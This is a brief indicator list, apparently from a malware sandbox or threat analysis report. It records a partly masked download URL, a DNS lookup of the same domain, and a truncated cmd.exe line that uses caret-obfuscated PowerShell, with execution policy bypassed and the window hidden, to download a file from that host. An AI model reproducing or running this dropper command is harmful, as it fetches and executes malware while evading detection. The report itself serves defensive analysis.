Technical Information
- http://ar####ectureky.bid/user.php?f=##### as %appdata%.exe
- DNS ASK ar####ectureky.bid
- '<SYSTEM32>\cmd.exe' /c Pow^eRs^helL.e^Xe^ -^ex^ec^U^tiO^nP^OL^Ic^Y^ ^BY^pass ^-^n^O^P^ROF^Ile -^wiNdOw^s^tyLe hIdd^e^n^ (^new-^obJ^ect ^s^Ys^t^em.Ne^t.^w^eBcli^en^t)^.d^owNlOa^dFIle('http://ar####ect...' (with hidden window)